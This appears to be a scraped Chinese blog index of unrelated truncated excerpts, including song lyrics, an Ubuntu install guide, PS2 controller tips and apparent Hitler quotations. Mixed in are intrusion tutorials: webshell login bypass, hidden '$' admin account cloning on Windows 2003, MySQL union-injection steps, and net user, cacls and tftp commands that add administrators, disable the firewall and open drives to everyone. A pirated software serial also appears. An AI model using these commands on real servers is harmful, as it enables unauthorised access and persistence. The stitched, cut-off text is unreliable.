Evonne

前不久拿到一个站webshell

发现里面有个站程序还不错..可密码一直找不到..
看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

login.asp的验证代码

<% dim user_name,user_password,upwr,uID,ukey,cmd,rs
user_name=trim(request.form("uid"))
user_password=trim(request.form("pwd"))
user_password=jk_md5(user_password,"long")
if user_name=&q...

ISAPI扩展初窥 从CGI说起…

话说CGI(Common Gateway Interface)通用网管接口是一项古老的动态网页交换技术,CGI程序通过对请求信息的解析,可以产生相应的处理,例如它可以在服务器端实现表格处理、数据查询、发送电子邮件等操作,并最终将处理后的信息返回给客户端浏览器,CGI技术可以说是动态网页技术的鼻祖,它在刚出道之际也是风靡一时,至今的许多应用仍然能够看到CGI的身影。然而就像许多技术一样,CGI本身也不可避免的具有一定的缺陷。当你在使用C、C++、甚至Perl语言在服务器端编写完成你的EXE程序并关联到相应请求后,每次的这个请求都会在内存中加载执行你的EXE程序,甚至是某个用户不断的打开同一个页面也是如此,重复的加载执行会消耗大量的内存,当类似这样的并发请求增多时,极容易造成服务器的崩溃。此外一个相对复杂的CGI程序本身的开发...

摘自：http://bavon.bokee.com/2762412.html
要安装Ubuntu Linux，首先需要在硬盘上创建Linux分区，然后才可以将Linux安装进去，最后进行配置。下面具体介绍如何操作。

首先，在硬盘上创建Linux分区

第一步，运行Norton PartitionMagic8.0（华中大在线可以下载）。

第二步，在硬盘分区上选择一个剩余空间大于4G的分区，单击鼠标右键，选择“调整容量/移动”，在弹出的对话框的“自由空间之...

      1、把IIS卸载。

　　2、把 %windir%\system32\inetsrv 删除。

　　3、把%windir%\iisX.log删除，X 是IIS版本。

　　4、把 \inetpub\ 目录删除。

　　（以上操作可以在安全模式中进行。）

　　5、重装IIS。　

问　　题：windows2003重装iis6.0的时候出现“安装程序无法复制文件文件IISApp.vbs”等，重装的时候遇到“安装程序无法复制文件IISApp.vbs”等一系列错误.

分　　析：这就是典型的windows安全数据库出问题了，可以这样来做

参考文章：Windows安全资料库，在%WinDir%\Security\database里。台湾的资料库，大陆称为数据库。在Windows作业系统里带有专门的Esentutl.exe工具，这是一个DOS工具，可用来查看和修复Windows安全资料库。

比如我有一次在安装IIS的元件时，发生了错误：
************************
复制错误 安装程式无法复制档 iisapp.vbs。请确认下面指定的位置是正确的，或...

从后台得到webshell技巧大汇总
作者：9xiao[F.S.T] lin[F.S.T]

 

前 言
　　动网上传漏洞，相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下，现在这种漏洞已经基本比较难见到了，不排除一些小网站仍然存在此漏洞。在拿站过程中，我们经常费了九牛两虎之力拿到管理员帐号和密码，并顺利进入了后台，虽然此时与拿到网站webshell还有一步之遥，但还是有许多新手因想不出合适的方法而被拒之门外。因此，我们把常用的从后台得到webshell的方法进行了总结和归纳，大体情况有以下十大方面。

注意：如何进入后台，不是本文讨论范围，其具体方法就不说了，靠大家去自己发挥。此文参考了前人的多方面的资料和信息，在此一并表示感谢。

一、直接上传获得webshell

      Robbie Williams

　　Better Man 好男人

　　Send someone to love me 请赐给我一个爱人，

　　I need to rest in arms 我想在她的臂弯中休息。

　　Keep me safe from harm 别让我在暴风骤雨中，

　　In pouring rain 受到伤害。

　　Give me endless summer 让我沐浴在无尽的夏日阳光中，

　　Lord I fear the cold 主啊，我害怕严寒。

　　Feel I'm getting old 感觉我的心在慢慢变老，

　　Before my time 虽然从外表看不出来。

信息来源：火狐联盟
作者: cnlnfjhh

今天无聊的时候和 偶们 CN群的 兄弟们检测站点的时候又拣到一个03的鸡
现在win2003的服务器真多 我最近基本见到的web站点全是 2003系统的
对以前 在 2000下 那些克隆的方法来说 用在03上会经常不奏效.
下面就参考以前焦点的 一个文章 加上自己的克隆心得 送给大家. 以下方法对
2003 100%有效!!

当登陆进3389以后--

先建立 cnlnfjhh$ 用户
c:\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在 控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCA...

1）如何查看本机所开端口：

用netstat -an命令查看！再stat下面有一些英文，我来简单说一下这些英文具体都代表什么～

LISTEN：侦听来自远方的TCP端口的连接请求

SYN-SENT：再发送连接请求后等待匹配的连接请求

SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认

ESTABLISHED：代表一个打开的连接

FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认

FIN-WAIT-2：从远程TCP等待连接中断请求

CLOSE-WAIT：等待从本地用户发来的连接中断请求

CLOSING：等待远程TCP对连接中断的确认

LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认

TIME-...

入侵渗透涉及许多知识和技术，并不是一些人用一两招就可以搞定的。

一，踩点

踩点可以了解目标主机和网络的一些基本的安全信息，主要有；

1，管理员联系信息，电话号，传真号；

2，IP地址范围；

3，DNS服务器；

4，邮件服务器。

相关搜索方法：

1，搜索网页。

  确定目标信息1，为以后发动字典和木马入侵做准备；寻找网页源代码找注释和
隐藏域，寻找隐藏域中的"FORM"标记。例如：

<FORM action=/Poll/poll.asp method=post>

<input type=hidden name=vice value=vice>

</FORM>

橙白
橙
绿白
蓝
蓝白
绿
棕白
棕

1326

绿白
绿
橙白
蓝
蓝白
橙
棕白
棕

1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本，可以用union查询
3.利用order by 暴字段，在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段，如: and 1=2 union select 1,2,3,......./*直到返回正常，说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限，and (select count(*) from mysql.user)>0 /*如果结果返回错误，那我们只能猜解管理员帐号和密码了。
6.如果返回正常，则可以通过and 1=2 u...

来个新鲜的，对很多实况迷们有所帮助！
通过以下方法我买到了心仪的PS2原柄，使用下来非常满意。
我劝即使不玩实况的人们也按以下方法去搞一个来，保证让你把你的罗技，微软手柄扔到窗外。
别忘了再选购usb转接器。建议GAMETEC的，质量非常好！

正文：

各型号原装手柄大比拼
PS2原装手柄分三个型号，分别是写在手柄背面的H、M、A，品质都很出众，基本没有差别，但是手感稍有不同。只要买到其中一种原装手柄都是没有问题的。

1.重量： H > M > A
A的手柄拿在手里轻飘飘的，H M 稍好一些

2.手柄线的硬度：A > M > H
A的...

R1是加速R2是快速
L1是跟其他键配合用的,比如L1+三角是过顶传球
L2是攻防转换


进攻：
○按钮：面对方向长传
X 按钮：面对方向短传
□按钮：射门 可用方向控制
△按钮：面对方向传身后球
□+X：默认方向假射扣球
L1+X：二过一
L1+△：挑传意识球
L1+□：掉射
L1*3：连续假动作
R1：高速带球
R2*2：假动作
R2*3：牛甩尾
□+R1：轻挑射门
R2+方向：不同方式拉球
防守：
R1：加速
L1：换人
X ：断球
□：协防
△：门将出击
○：铲球 ,大脚解围
本方控球时
按键 效果 推荐指数...

歌手：Bressanon-布列瑟农      
《狼》-bressanon布列瑟农 Here I stand in Bressanone

with the stars up in the sky

Are they shining over Brenner

and upon the other side

you would be a sweet surrender

I must go the other way

And my train will carry me onward

though my heart would surely stay

Wo my heart would surely stay

cacls c: /e /t /g everyone:F          把c盘设置为everyone可以浏览
cacls d: /e /t /g everyone:F         把d盘设置为everyone可以浏览
cacls e: /e /t /g everyone:F         把e盘设置为everyone可以浏览
cacls f: /e /t /g everyone:F         把f盘设置为every...

net localgroup administrators oohos /add   将oohos提升为管理员
net user 显示所有用户
net user hacker 123/add   建立一个用户
net stop sharedaccess   停止XP自带防火墙
net user guest /active:yes  激活GUEST用户
net start telnet  开启TELNET服务
net user guest /active:yes  激活GUEST用户
tftp -i 目标IP get 文件名存放地址(目标主机)     TFTP上传命令
ipco...

如果你刚刚学会穷举暴破，一定经常感到奇怪，为什么有些破解者发布的密码就是他的名字？为什么有

些破解者能够发布某个网站的一大堆密码？而当你逐渐熟悉暴力破解之后，也自然会经常碰到这个问题

，那就是－－exploit。
　　到底什么是exploit呀？谁能给我一些exploit list？这个exploit怎么利用呀？......诸如此类的

问题随处可见。诚然，exploit是所有破解者追求的更高境界。能够通过 exploit获得网站的大把密码

，甚至添加具有个人特征的自定义密码，确实是令人羡慕的技巧。但是，如果你公开提出有关exploit

的问题，并不会得到实质性的解答。于是大家开始抱怨，高手们怎么那么吝啬呀，公开一些小秘密又不

会身上少块肉，干嘛...

创建时间：2005-02-20
文章属性：原创
文章提交：sniper (sniperhk_at_163.com)

google hacking的实现以及应用(上)

本文作者:sniper
文章出于:www.4ngel.net
日  期 : 0...

 容祖儿 小小
 作词：方文山 作曲：周杰伦 编曲：林迈可
 回忆像个说书的人
 用充满乡音的口吻
 跳过水坑 绕过小村
 等相遇的缘分
 你用泥巴捏一座城
 说将来要娶我进门
 转多少身 过几次门 虚掷青春
 小小的誓言还不稳
 小小的泪水还在撑
 稚嫩的唇　在说离分
 我的心里从此住了一个人
 曾经模样小小的我们
 那年你搬小小的板凳
 为戏入迷我也一路跟
 我在找那个故事里的人
 你是不能缺少的部份
 你在树下小小...

一、 端口
一）、端口的一般含义
说到端口，这确实是个老话题，但一切都是从它开始的，不得不说。何谓端口，打个比方，你住在一座房子里，想让别人来拜访你，得在房子上开个大门，你养了个可爱的小猫，为了它的进出，专门给它修了个小门，为了到后花园，又开了个后门……所有这些为了进到这所房子里而开的门我们叫它端口，这些为了别人进来而开的端口称它为"服务端口"。
你要拜访一个叫张三的人，张三家应该开了个允许你来的门____服务端口，否则将被拒之门外。去时，首先你在家开个"门"，然后通过这个"门"径直走进张三家的大门。为了访问别人而在自己的房子开的"门"，我们称它为"客户端口"。它是随机开的而且是主动打开的，访问完就自行关闭了。它和服务...

准备买一个huado的东西

不知道效果会怎么样

这个是录制视频的软件 很好用 而且压缩的话也不大

http://www.crsky.com/soft/2744.html

Name:crsky
Code:2SXSI-DHM8J-GD4IU-T1Q7F-84LK

作者：许文强（xwq),QQ:57133683　

————只要给我一个注射点，无论什么权限，我都给你一个webshell甚至系统权限

声明：本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。因为

发觉其危害过大，原文已经经过大量删减及修改，即使这样本文的危害性仍然很

大，所以请大家不要对国内的站点做任何具有破坏性的操作。


考虑再三，偶还是决定发出来。此招手段歹毒，利用范围广泛，可以说是只要是

有sql注射漏洞的网站，只要运用此法99%可以拿到webshell甚至系统权限（不敢

把话说满，呵呵，经本人数百次真实"实战演习"，基本上是100%可以拿到

webshell甚至系统权限）。
记得我在《...

LABEL[盘符：][卷标名]

文章标题：动易最新未公开Bug
文章作者：WhyTt
漏洞发现时间：2006年10月22日
个人Blog：http://why_tt.mblogger.cn //个人
个人Blog：http://whytt.mblogger.cn  //技术
影响版本：ACCESS和MSSQL

标题：2006年各类优秀技术图片前10
来源：CSD

2006年程序设计语言类Top10 

没了.NET和Java的竞争，C++是理所应当的胜利者，数数，它在十个里面占了八个。  
   
C++ Primer中文版(第4版) 
（美）Stanley B. Lippman Barbara E. Moo Josée LaJoie / 03 1 2006 12:00AM / 人民邮电出版社 / 99元 / 16开 /&n...

1；「我们的斗争只可能有两种结果：要麼敌人踏著我们的屍体过去，要麼我们踏著敌人的屍体过去
2；「如果有人说：你做梦吧！我只能回答他说：你这个笨蛋，如果我不是一个梦想者的话，我们今天会在
哪里呢？我一直相信德国，你说我是一个做梦者；我一直坚信帝国的崛起，你说我是个傻子；我一直相信我能重新夺回权利，你说我疯了；我一直坚信贫穷会有尽头，你说那是乌托邦。谁是对的？你还是我？！我是对的，我一直会是！」

3；「一个民族正经历著动荡，我们，在被幸运之神垂青。」

4；「我们应该感到高兴，未来必将完全属於我们！」

5；「德国的明天就指望你们了，德国的青年们！」

6；「我们必须咬紧牙关，全力以赴去做一件事情；否则，我们将一事无成。」

7；「每一代都至少应该经历一场战争的洗礼。...

有部分人反映无法正常显示中文名，具体的方法是先把把ID3显示信息的选项由原来的“自动”换成：“中国语”，然后再把菜单换成中文即可，不要颠倒顺序了

天气晴朗阳光灿烂用100度胶卷
阴天用用200度胶卷
黎明和傍晚用400度胶卷